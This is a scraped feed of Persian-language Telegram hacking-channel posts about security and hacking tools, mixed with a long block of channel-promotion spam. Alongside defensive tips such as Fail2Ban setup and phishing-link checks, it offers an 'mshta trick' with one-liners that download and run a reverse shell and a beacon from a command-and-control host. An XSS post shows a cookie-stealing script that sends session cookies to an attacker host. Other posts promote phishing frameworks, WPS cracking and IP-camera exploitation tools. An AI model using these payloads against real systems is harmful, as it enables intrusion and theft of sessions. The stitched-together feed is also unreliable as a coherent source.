13157
@durov Этот пост ни в коем случае не аморален. Этот канал является фан-каналом, и мы не публикуем какой-либо аморальный #telegram_Rules #Правила_телеграма
✅بانک از کانال های تخصصی : #کامپیوتر #معماری #برنامه_نویسی #کامپیوتر #مهندسی_برق و غیره هستی ⁉️
🔑پس روی گزینه ADD بزن و تا کلی کانال تخصصی و آموزشی بهت معرفی بشه 👇👇👇
🔴 لینک 1 : /channel/addlist/xFIZJDBxex04Y2E0
🔴 لینک 2 : /channel/addlist/h5J-zqBZ5uUzNTM0
.
🛡 پیکربندی Fail2Ban در لینوکس: محافظت از سرور در برابر حملات brute-force در 5 دقیقه
؛Fail2Ban، لاگهای سرویسهای سیستم را تحلیل میکند، فعالیتهای مشکوک را شناسایی کرده و به طور خودکار آدرسهای IP مهاجمان را مسدود میکند.
پیکربندی سریع:
# ایجاد فایل پیکربندی محلی
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo nano /etc/fail2ban/jail.local
پارامترهای پایه (در ابتدای فایل):
bantime = 10m # مدت زمان مسدودسازی
findtime = 10m # بازه زمانی تحلیل
maxretry = 5 # تعداد تلاشها قبل از مسدودسازی
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 5
sudo systemctl start fail2ban
sudo systemctl enable fail2ban
sudo systemctl status fail2ban
sudo fail2ban-client status sshd
t.me/Hack4ManЧитать полностью…
🛡؛PatchMon: مدیریت متمرکز بهروزرسانیها در محیطهای سرور
🔺این ابزار برای مدیران سیستم و تیمهای امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز بهروزرسانیها را در سرورهای مختلف فراهم میکند. عوامل (agents) فقط از طریق کانالهای خروجی با سرور PatchMon ارتباط برقرار میکنند، بنابراین نیازی به باز کردن پورتها و مواجهه با خطرات امنیتی نیست.
قابلیتها:
مدیریت متمرکز پچها در تعداد زیادی سرور
عوامل از طریق اتصالات خروجی کار میکنند (بدون نیاز به پورتهای باز)
نمایش کامل وضعیت بهروزرسانیها
خودکارسازی ایمن فرآیندها
t.me/Hack4ManЧитать полностью…
📦 کتابخانه روز: PyJWT — کار با توکنهای وب JSON
؛JWT یک استاندارد برای انتقال امن دادهها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکنها است.
نصب:pip install pyjwt
مثال: ایجاد و بررسی توکن:
import jwt
import datetime
SECRET_KEY = "your-secret-key"
payload = {
"user_id": 123,
"username": "alex",
"exp": datetime.datetime.now(datetime.UTC) + datetime.timedelta(hours=1)
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(f"توکن: {token}")try:
decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
print(f"سلام، {decoded['username']}!")
except jwt.ExpiredSignatureError:
print("توکن منقضی شده است")
except jwt.InvalidTokenError:
print("توکن نامعتبر است")
t.me/Hack4ManЧитать полностью…
💡ترفند: mshta - ایجاد یک شل معکوس از طریق برنامه HTML
🔺فکر میکنید mshta.exe فقط برای اجرای فایلهای .hta استفاده میشود؟ خندهدار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که میتواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود میشود و حتی زمانی که PowerShell غیرفعال است، کار میکند. بریم سراغش!
🔺؛mshta چه قابلیتهایی دارد (و چرا این موضوع عالی است)
1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c whoami",1,true);close()mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://c2.com/rev.ps1')",0,true);close()mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe && beacon.exe",0,true);close()t.me/Hack4ManЧитать полностью…
🕷؛TGSpyder: ابزاری OSINT برای جمعآوری دادهها از تلگرام
یک ابزار خط فرمان (CLI) برای تحلیلگران، روزنامهنگاران و محققان. این ابزار، اعضا، پیامها، لینکهای دعوت و فرادادهها را از گروهها/کانالهای عمومی و خصوصی جمعآوری میکند. تمام اطلاعات به فرمت CSV خروجی داده میشوند تا تجزیه و تحلیل آنها آسانتر باشد.
قابلیتها:
جمعآوری لیست اعضا (در صورت امکان)
خروجی گرفتن از تاریخچه پیامها
استخراج و حذف لینکهای تکراری t.me
جستجوی کاربر بر اساس نام کاربری یا شناسه (ID)
تعیین سازنده بستههای استیکر بر اساس شناسه (ID) مجموعه استیکرها
⚙ نحوه نصب:
bash
git clone https://github.com/Darksight-Analytics/tgspyder.git
cd tgspyder
pip install -r requirements.txt
pip install -e .
bash
tgspyder /channel/examplegroup --members --chats
tgspyder --user @username
tgspyder --sticker-pack /channel/addstickers/packname
t.me/Hack4ManЧитать полностью…
👩💻 Hydra
🔺هیدرا ابزاری است که امکان انتخاب خودکار نام کاربری و رمز عبور را برای تعداد زیادی از سرویسهای شبکه فراهم میکند. این ابزار از مجموعهای گسترده از پروتکلها پشتیبانی میکند، به طور انعطافپذیری برای سناریوهای مختلف قابل تنظیم است و اغلب برای بررسی امنیت اطلاعات کاربری در محیطهای آزمایشی استفاده میشود. علاوه بر این، هیدرا برای خودکارسازی حملات به سرویسهایی که از احراز هویت پایه استفاده میکنند، مناسب است.
⬅️ لینک گیتهاب
t.me/Hack4ManЧитать полностью…
👩💻 Modlishka
🔺؛Modlishka به شما امکان میدهد از یک پروکسی HTTP معکوس خودکار استفاده کنید. کاربر همچنین میتواند از این ابزار برای "مسموم کردن" خودکار حافظه پنهان (کش) مرورگر با استفاده از کد وضعیت HTTP 301 استفاده کند. علاوه بر این، میتوان از آن برای جمعآوری آدرسهای URL که از TLS استفاده میکنند، بهره برد. Modlishka از اکثر روشهای احراز هویت چند عاملی پشتیبانی میکند و میتواند آسیبپذیریهای مربوط به 2FA (احراز هویت دو مرحلهای) را شناسایی و برجسته کند.
⬅️ لینک به GitHub
t.me/Hack4ManЧитать полностью…
💻 نقشه راه هکرها
🔺آیا آمادهاید تا سفری هیجانانگیز به اعماق امنیت سایبری را آغاز کنید؟ چه به دنبال دریافت یک مدرک معتبر، آماده شدن برای دریافت مدرک لیسانس باشید، یا صرفاً بخواهید کنجکاوی بیپایان خود را برطرف کنید، این نقشه راه، راهنمای ارزشمندی در مسیر تبدیل شدن به یک متخصص واقعی در زمینه هک خواهد بود. اما قبل از اینکه به جزئیات بپردازیم، بیایید اهداف خود را مشخص کنیم. چه چیزی شما را جذب میکند: هیجان، چالش، یا شاید تصور میکنید که در یک شغل پیشرو در زمینه امنیت سایبری فعالیت خواهید داشت؟ انگیزههای شما مسیر پیش رو را تعیین میکنند، بنابراین بیایید مسیری را ترسیم کنیم که دقیقاً با آرزوهای شما مطابقت داشته باشد.
🐙 لینک گیتهاب
t.me/Hack4ManЧитать полностью…
💻 ؛LOLBAS سیستمها و اسکریپتهای باینری
🔺؛Living Off The Land یک پروژهای است که فایلهای باینری، اسکریپتها و کتابخانههای ویندوز را مستند و فهرست میکند که میتوانند برای اهداف جایگزین، اغلب توسط هکرها یا تیمهای قرمز، مورد استفاده قرار گیرند. این پروژه به عنوان یک منبع جامع برای متخصصان امنیت اطلاعات عمل میکند تا درک بهتری از سوء استفاده بالقوه از ابزارهای قانونی ویندوز داشته باشند.
🐙 لینک GitHub
t.me/Hack4ManЧитать полностью…
☑️ نکته کاربردی برای تست نفوذ: یافتن اکسپلویتها در عرض چند ثانیه، بدون نیاز به اینترنت
🔻آیا سرور Apache 2.4.49 یا نسخه قدیمیتر Tomcat را در سرور هدف پیدا کردهاید؟ نیازی نیست در مرورگر بگردید و عبارت "اکسپلویت برای نسخه X" را جستجو کنید. در Kali، ابزار searchsploit وجود دارد که یک پایگاه داده محلی از اکسپلویتها از Exploit-DB است و بدون نیاز به اینترنت کار میکند.
⚙نحوه کارکرد:searchsploit apache 2.4.49
📌این دستور لیستی از تمام اکسپلویتهای مربوط به این نسخه را نمایش میدهد: نام، مسیر فایل، نوع آسیبپذیری.
🔸نمونه خروجی:
Apache 2.4.49 - Path Traversal (CVE-2021-41773) | linux/remote/50383.py
Apache 2.4.49 - Remote Code Execution (CVE-2021-42013) | linux/remote/50406.py
searchsploit apache 2.4.49 --cvesearchsploit apache 2.4.49 -wsearchsploit -m 50383searchsploit -unmap -sV 192.168.1.100 → مشاهده Apache 2.4.49searchsploit apache 2.4.49 → یافتن RCE (اجرای کد از راه دور)searchsploit -m 50406 → کپی کردن اکسپلویتt.me/Hack4ManЧитать полностью…
✅ ؛Macchanger — ابزاری برای دستکاری آدرسهای MAC
🔶؛Macchanger ابزاری است برای مشاهده، تغییر و دستکاری آدرسهای MAC کارتهای شبکهای در سیستمهای لینوکس.
🔷این ابزار عملکردهای مختلفی را ارائه میدهد، مانند تغییر آدرس به گونهای که با یک سازنده خاص مطابقت داشته باشد، یا تصادفیسازی کامل آن.
🌐 لینک به GitHub
t.me/Hack4Man
💡 ترفند: پیدا کردن زیردامنه ها از طریق crt.sh بدون ایجاد سر و صدا
📌نمی خواهید اسکن فعال را آشکار کنید، و بررسی دستی زیردامنه، با یک دستور، تمام گواهینامه های SSL صادر شده برای یک دامنه در دسترس شما خواهد بود. crt.sh حتی زیردامنه هایی را می شناسد که در DNS ثبت نشده اند.
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u
target.com را به جای مثال وارد کنید و پس از چند ثانیه، لیستی از تمام زیردامنه هایی که تا به حال در گواهینامه ها وجود داشته اند را مشاهده خواهید کرد. بدون نصب، بدون تنظیمات، و بدون هیچ ردی در لاگ های هدف.
💻 ؛ShodanX — ابزار پیشرفته برای تعامل با API شادان و انجام OSINT
🔺؛ShodanX یک ابزار خط فرمان قدرتمند است که برای جستجو و جمعآوری مؤثر اطلاعات درباره دستگاههای متصل به اینترنت از طریق پلتفرم شادان طراحی شده است.
🔺؛ShodanX کار با فیلترهای شادان را ساده میکند، از صادرات نتایج پشتیبانی میکند و به سرعت به کشف نقاط ورود احتمالی یا نشت دادهها در شبکه جهانی کمک میکند.
لینک به گیتهاب
🛡@ir_c_a
🔸️؛WEF (چارچوب بهرهبرداری از وایفای) — چارچوبی برای ارزیابی امنیت و حملات به شبکههای وایفای
🔹️؛WEF ابزاری جامع برای خودکارسازی تست نفوذ در شبکههای بیسیم است. امکان انجام طیف گستردهای از حملات را فراهم میکند، از جمله ایجاد «دوقلوهای شرور» (Evil Twin)، بهرهبرداری از آسیبپذیریهای WPS و رهگیری دستدادنهای WPA به صورت خودکار.
🌐 لینک گیتهاب
🛡@ir_c_aЧитать полностью…
📚 آرشیو معتبرترین مجلات جهان
🆔 @EnglishMagazines_PDF
🔻🔻🔻🔻🔻🔻🔻🔻🔻
پکیجهای آموزشی 2026 اینجا آپلود شد (فول رایگان)
JOIN
آموزش رایگان طراحی وب سایت + سئو حرفه ای
JOIN
آبجکتای 3DMAX رایگان
JOIN
آموزش برنامهای ویندوز
JOIN
《 طراحی پوسترهای تبلیغاتی 》 : ایده، هنر،خلاقیت
JOIN
((آموزش و کسب درآمد از تدوین و فیلمسازی ))
JOIN
جزوه پولی رایگان دانلود کن!!!
JOIN
پروکسی پرسرعت، VPN و کانفیگ (((مجانی)))
JOIN
بزرگ ترین کاریابی دانشجویی
JOIN
نحوه ساخت هرچی فکر کنی اینجاست!
JOIN
دنیای آموزش های موبایل و کامپیوتر
JOIN
مرکز تعمیرات موبایل
JOIN
رایگان استخدام شو /vip/ !!!
JOIN
آموزش 0 تا 100 هک
JOIN
دنیای آموزش های جذاب کامپیوتر
JOIN
دنیای پکیج های رایگان
JOIN
آموزش Grammer آیلتس
JOIN
صفر تا صد هوش مصنوعی و علم داده
JOIN
آموزش های جذاب برنامه نویسی
JOIN
مکالمات انگلیسی به روش کدینگ
JOIN
پروژه یابی
JOIN
تصاویر جذاب مهندسی
JOIN
علم داده و تحلیل داده
JOIN
مهندسی هوافضا و تکنولوژی جنگنده ها
JOIN
گروه معماری " چهارسوق "
JOIN
سیرتاپیاز برنامه نویسی رو قورت بده
JOIN
مکالمههای روزمره انگلیسی
JOIN
کلی آموزش از منابع هوش مصنوعی
JOIN
ترفند های طلایی کامپیوتر و موبایل
JOIN
مدرسه دانش و اطلاعات
JOIN
آموزش شبکه های Cisco و مایکروسات
JOIN
ایدهای دکوراسیون داخلی
JOIN
شغل دانشجویی با درآمد 3/000/000
JOIN
انواع VPN + کانفیگ نامحدود (( رایگان ))
JOIN
آموزش سخت افزار کامپیوتر و لپتاپ (رایگان)
JOIN
آموزش فتوشاپ از مقدماتی تا پیشرفته
JOIN
فول پکیج های پولی رو رایگان دانلود کنید
JOIN
سیر تا پیاز هک و امنیت (( فول رایگان ))
JOIN
آموزش کامل « دستورات ترموکس هک »
JOIN
اخبار هوش مصنوعی + تکنولوژی + IT
JOIN
اسرار موفقیت و سخنان بزرگان
JOIN
آموزش طراحی لوگو ، ایلوستریتور
JOIN
انفجار اسپیکینگ و لیسنینگ
JOIN
دانلود PDF جزوات دانشگاهی
JOIN
انگلیسی 5 دقیقه ای با استاد نیتیو
JOIN
داستانهای مصور صوتی انگلیسی
JOIN
سریال روم " دنیای فیلمای خارجی "
JOIN
آرشیو کامل آبجکتهای رویت
JOIN
آبجکت های 3بعدی 3DDD
JOIN
وقتشه اکسل یاد بگیری
JOIN
ایده کسب وکار پول ساز
JOIN
دانشجویی و اینجا نیستی؟؟؟
JOIN
اسرار موفقیت و سخنان بزرگان
JOIN
کانال استخدامی نفت
JOIN
آموزش های رایگان کامپیوتر
JOIN
❰❰❰ انگلیسی را حرفهای بیاموز ❱❱❱
JOIN
آموزش حرفه ای برنامه نویسی
JOIN
کلی فیلم امریکایی با دو زیرنویس همزمان
JOIN
مکالمات انگلیسی با ترجمه و فایل صوتی
JOIN
پکیج های پولی رایگان
JOIN
دنیای رباتیک و تازه های تکنولوژی
JOIN
گرگ والستریت کارخانه پول سازی
JOIN
وقتشه پاورپوینت را یاد بگیری
JOIN
آموزش حرفه ای برنامه نویسی و طراحی سایت
JOIN
آموزش برق صنعتی
JOIN
مقاله ❖ISI❖ با هوش مصنوعی
JOIN
برنامه نویسی و طراحی سایت
JOIN
اموزش هک غیرقانونی با (موبایل)
JOIN
آموزش های کاربردی برق صنعتی
JOIN
همه چیز درباره طراحی و توسعه وبسایت(( حرفهای))
JOIN
منبع آموزشهای Python ( رایگان، پروژه محور+ Code)
JOIN
تجمع دانشجویان مکانیک
JOIN
آموزش مبتدی تا حرفه ای برنامه نویسی
JOIN
کدنویسی با هوشمصنوعی | Vibe Coding | GPT
JOIN
مجله هوشمصنوعی
JOIN
انگلیسی از مبتدی تا پیشرفته
JOIN
دانلود برنامه اندرویدی ها
JOIN
آموزش تکنیک های زبان انگلیسی
JOIN
آموزش برنامه نویسی از پایه (کاملا رایگان)
JOIN
صفرتاصد هوش مصنوعی و پرامپت نویسی (رایگان)
JOIN
آموزش حرفه ای برنامه نویسی پایتون (فول رایگان)
JOIN
➖➖➖➖➖➖
🌈@Armisstab
.
✅ WhatsApp-OSINT
این ابزار، عکسهای پروفایل واتساپ را دریافت میکند، حسابهای تجاری را بررسی میکند، وضعیت کاربران را تعیین میکند و دستگاههای مرتبط را از طریق رابط OSINT شرکت RapidAPI تجزیه و تحلیل میکند.
📁 زبان: پایتون
⭐️ تعداد ستارهها: 973
⬅️ لینک گیتهاب
t.me/Hack4ManЧитать полностью…
📊یک ترمینال، مانیتورینگ مستقل را ارائه میدهد – نیازی به اجرای برنامههایی مانند htop، iotop، nethogs و df نیست.
🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسکها، شبکه، دما و باتری؛ قابل اجرا در سیستمعاملهای Linux، macOS و Windows.
🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتبسازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.
🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسکها با قابلیت نمایش تاریخچه.
🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگنمایی زمانی.
📥 لینک به گیتهاپ
📌قابلیت سفارشیسازی در سطح تمها، ویجتها و فرکانس بهروزرسانی. از ماوس پشتیبانی میشود.
t.me/Hack4ManЧитать полностью…
؛Phishing Frenzy — یک چارچوب برای حملات فیشینگ
🔺؛Phishing Frenzy یک ابزار قدرتمند و متنباز است که برای ایجاد و مدیریت کمپینهای فیشینگ طراحی شده است.
🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار میدهد، از جمله ایجاد وبسایتهای جعلی، ارسال ایمیلهای فیشینگ و ردیابی نتایج حملات.
📌لینک گیت هاپ
t.me/Hack4ManЧитать полностью…
🤖 ؛PentAGI: سیستم چندعاملی برای تست نفوذ خودکار
🔺این ابزار از عاملهایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده میکند. این عاملها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار میکنند، خود تصمیمگیری میکنند و وظایف را انجام میدهند.
⚙ قابلیتها:
معماری چندعاملی: عوامل مختلف مسئولیتهای مختلفی مانند جمعآوری اطلاعات، اسکن و بهرهبرداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدلهای کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیتهای عوامل به صورت زنده.
🔗 GitHub: PentAGI
t.me/Hack4ManЧитать полностью…
🔒 بلکبیرد (Blackbird)
👁 یک ابزار OSINT برای جستجوی ردپاهای دیجیتال بر اساس نام کاربری و آدرس ایمیل در شبکههای اجتماعی.
بلکبیرد، حسابها را در بیش از 600 پلتفرم جستجو میکند، و با ترکیب بررسی در دسترس بودن پروفایلها، فیلتر کردن نتایج و تحلیل خودکار، کارایی بالایی دارد. این ابزار از خروجی دادهها در قالبهای PDF و CSV پشتیبانی میکند و همچنین از هوش مصنوعی برای پروفایلسازی اطلاعات یافتشده، مستقیماً از خط فرمان، استفاده میکند.
❗️ این ابزار برای متخصصان OSINT، محققان امنیت و تحلیلگران، برای خودکارسازی جمعآوری اطلاعات عمومی، بسیار مناسب است.
📱 گیتهاب (GitHub)
برچسبها: #ابزارها #هک #امنیت
t.me/Hack4ManЧитать полностью…
🔻دیگه وقتت رو با گشتن دنبال پروژه، و موقعیت شغلی، تلف نکن! از آموزش تا پروژههای واقعی، همه اینجا هست!
🔸فرصت رو از دست نده، همه منتظرشن!
☑️ راهنمایهای فوقالعاده برای تست نفوذ
🔺مجموعهای از راهنمایها و چکلیستها که برای امنیت و تست نفوذ مفید هستند. این لیست شامل مجموعهای بزرگ از منابع مرتب و انتخابشده است که به شما کمک میکند تا زمان زیادی را صرفهجویی کنید.
⬅️ مشاهده کنید اینجا
t.me/Hack4ManЧитать полностью…
🔐 پیادهسازی کامل کلاینت I2P به زبان C++
📌؛I2P (پروتکل اینترنت نامرئی) یک لایه شبکه همهمنظوره و ناشناس است.
🔺تمام ارتباطات از طریق I2P ناشناس بوده و با رمزنگاری سرتاسری محافظت میشوند؛ کاربران، آدرسهای IP واقعی خود را فاش نمیکنند.
🔗 لینک F-Droid
t.me/Hack4ManЧитать полностью…
✅ ؛Reaver — ابزاری برای حدس زدن کد WPS با روش جستجوی کامل
💢 ؛Reaver یک ابزار برای هک کردن شبکههای بیسیم است.
🔺این ابزار با انجام یک حمله مستقیم به کد WPS (Wi-Fi Protected Setup)، سعی در بازیابی رمز عبور WPA/WPA2 دارد.
🔺به طور متوسط، این ابزار میتواند رمز عبور را از روترهای آسیبپذیر در طی 4 تا 10 ساعت، بسته به نوع دستگاه، قدرت سیگنال و خود کد WPS، بازیابی کند.
🐙 لینک گیتهاب
t.me/Hack4ManЧитать полностью…
💻 ؛Tmpmail — سرویس ایمیل موقت
🔺ایمیل موقت، سرویسی است که به کاربر یک آدرس ایمیل در وبسایت خود برای مدت معینی ارائه میدهد.
🔺؛Tmpmail یک ابزار خط فرمان است که با زبان POSIX sh نوشته شده و به شما امکان میدهد یک آدرس ایمیل موقت ایجاد کنید و ایمیلها را در آن آدرس موقت دریافت کنید.
⭕️ این مخزن از API 1secmail برای دریافت ایمیلها استفاده میکند.
❌ توجه داشته باشید، از این اسکریپت در ترموکس نمی تونید استفاده کنید، در محیط های لینوکس واقعی، نه شبیه ساز ها.
🌐 لینک به GitHub
t.me/Hack4ManЧитать полностью…
🔍 چگونه یک وبسایت اصلی را از یک تقلبی تشخیص دهیم و از وارد کردن رمز عبور به کلاهبرداران جلوگیری کنیم
شما یک لینک دریافت میکنید: сбер-онлайн.xyz یا g00gle.com. به نظر میرسد مشابه است، اما چیزی درست نیست. کلاهبرداران ظاهر وبسایتهای معروف را کپی میکنند، یک حرف در آدرس را تغییر میدهند و شما ناخواسته رمز عبور خود را در یک صفحه تقلبی وارد میکنید. به یاد داشته باشید. یک کلیک اشتباه میتواند منجر به از دست دادن حساب کاربری، پول و آرامش شما شود. در اینجا نحوه بررسی لینکها بدون ریسک آورده شده است.
لینک فیشینگ چیست؟
این یک آدرس است که خود را به عنوان یک آدرس واقعی جا میزند. به عنوان مثال:
- g00gle.com به جای google.com
- vk.com.secure-login.ru به جای vk.com
- сбер-банк.онлайн (دامنه نامعتبر)
هدف این است که شما را وادار به وارد کردن نام کاربری و رمز عبور در یک صفحه تقلبی کنند.
🛡 بررسی گام به گام لینک
1. روی لینک قرار دهید (در رایانه)
فقط موس را روی لینک ببرید - آدرس واقعی در پایین مرورگر ظاهر میشود. اگر یک دامنه عجیب و غریب مشاهده کردید، روی آن کلیک نکنید.
2. لینک را نگه دارید (در تلفن)
نگه داشتن طولانی مدت روی لینک در پیامرسان یا مرورگر، آدرس کامل آن را نشان میدهد. اگر مجموعهای بیمعنی از کاراکترها یا یک دامنه مشکوک مشاهده میکنید، وارد آن نشوید.
3. لینک کوتاه را باز کنید
لینکهایی مانند bit.ly/2x3kF آدرس نهایی را پنهان میکنند. از سرویسهای رمزگشایی استفاده کنید:
- Unshorten.it (آنلاین)
4. از طریق VirusTotal بررسی کنید
لینک را کپی کنید و در VirusTotal جایگذاری کنید. این وبسایت آن را با دهها آنتیویروس بررسی میکند و نشان میدهد که آیا در پایگاه داده منابع کلاهبرداری ثبت شده است یا خیر.
5. از طریق urlscan.io بررسی کنید
لینک را ارسال کنید. این سرویس به طور خودکار وبسایت را در یک محیط ایزوله باز میکند، یک اسکرینشات میگیرد، ریدایرکتها و درخواستهای شبکه را نشان میدهد. شما میبینید که لینک به کجا منتهی میشود، بدون اینکه خودتان آن را باز کنید.
اگر قبلاً روی لینک کلیک کردهاید چه باید کرد
1. هیچ داده ای وارد نکنید. تب را ببندید.
2. اگر رمز عبور را وارد کردهاید، فورا رمز عبور خود را در وبسایت اصلی تغییر دهید.
3. احراز هویت دو مرحلهای (2FA) را در تمام سرویسهای مهم فعال کنید.
🛡@ir_c_a
⚠️ ؛CamOver | ابزار شناسایی و تست نفوذ دوربینهای IP پذیر
آیا میدانید چقدر از دوربینهای مداربسته در شبکه بدون محافظت هستند؟ CamOver ابزاری تخصصی برای شناسایی و بررسی آسیبپذیریهای دوربینهای IP است. 🛡️🔍
🛠️ قابلیتهای اصلی:
🔹 اسکن هوشمند: شناسایی خودکار مدلهای آسیبپذیر از برندهای معروف (مانند Hikvision، TP-Link، CCTV و غیره).
🔹 بهرهبرداری خودکار: استفاده از آسیبپذیریهای عمومی و اطلاعات کاربری پیشفرض (Default Credentials).
🔹 دسترسی به استریم: توانایی دسترسی به جریان ویدیویی دوربینهای محافظتنشده.
🔹 انعطافپذیری بالا: پشتیبانی از اسکن تکهدف و اسکن گسترده کل زیرشبکه.
👨💻 مناسب برای: متخصصین امنیت، تستکنندههای نفوذ و کارشناسان شبکه.
📂 لینک مخزن در گیتهاب:
🔗 GitHub - CamOver
⚠️ توجه: این ابزار صرفاً جهت مقاصد آموزشی و تست امنیت تهیه شده است. استفاده غیرمجاز مسئولیت بر عهده کاربر است.
#امنیت_شبکه #تست_نفوذ #هک #دوربین_دوربین #سایبر_امنیت #CyberSecurity #EthicalHacking #CamOver #IPCamera
🛡@ir_c_a
🌐؛GeoVista سامانه عاملی استدلال بصری با افزونه وب برای موقعیتیابی دقیق جغرافیایی
🔹️؛GeoVista یک سامانه پیشرفته مبتنی بر عاملهای هوش مصنوعی است که برای تعیین موقعیت جغرافیایی از روی تصاویر (موقعیتیابی جغرافیایی) با استفاده از استراتژیهای استدلال بصری و جستجوی خارجی طراحی شده است.
🔸️این پروژه مسائل پیچیده «جهتیابی بصری» را با تقلید از عملکرد یک کارشناس حل میکند: عامل جزئیات عکس (معماری، تابلوهای راهنمایی، چشمانداز) را تحلیل کرده و از جستجوی وب برای بررسی فرضیات استفاده میکند.
📌لینک گیتهاب
https://github.com/BlackSnufkin/LitterBox
🛡@ir_c_a
💻 ؛XSS — دزدیدن کوکی در یک ثانیه از طریق سایت دیگر
یک آسیبپذیری که ۲۰ سال قدمت دارد، اما هنوز هم هکرها را به پنلهای مدیریت در سراسر جهان راه میدهد.
🎯 ماهیت: هکر در سایت یک فرم یا پارامتری پیدا میکند که <script> را فیلتر نمیکند. کد خود را در آن قرار میدهد. قربانی صفحه را باز میکند — کد اجرا میشود.
مثال دزدیدن کوکی (کوکی جلسه، جایی که رمز عبور به صورت رمزنگاری شده ذخیره شده):
<script>
fetch('http://хакер.ру/steal?cookie=' + document.cookie);
</script>
🛡@ir_c_aЧитать полностью…